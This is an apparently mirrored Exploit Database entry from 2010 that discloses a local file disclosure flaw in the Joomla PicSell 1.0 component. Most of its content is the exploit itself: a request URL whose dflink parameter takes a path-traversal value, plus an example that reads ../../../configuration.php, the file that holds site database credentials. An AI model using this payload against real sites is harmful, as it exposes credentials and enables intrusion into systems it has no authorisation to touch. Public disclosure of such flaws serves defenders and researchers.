Joomla! Component PicSell 1.0 – Local File Disclosure

• Exploit Database
• 68 阅读

• 作者： Craw
  日期： 2010-08-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14845/

• # Author: Craw
  # Email: craw@element7.eu 
  # Software Link: http://vm.xmlswf.com/index.php?option=com_content&view=article&id=104&Itemid=131
  # Category: web applications
  
  =======================================================
  
  [+] ExploiT :
   
   http://server/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=[File Disclosure]
   
  
  [+] Example :
   
   http://server/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php
   
  
  =======================================================
  Greetz @ LUXEMBOURG
  =======================================================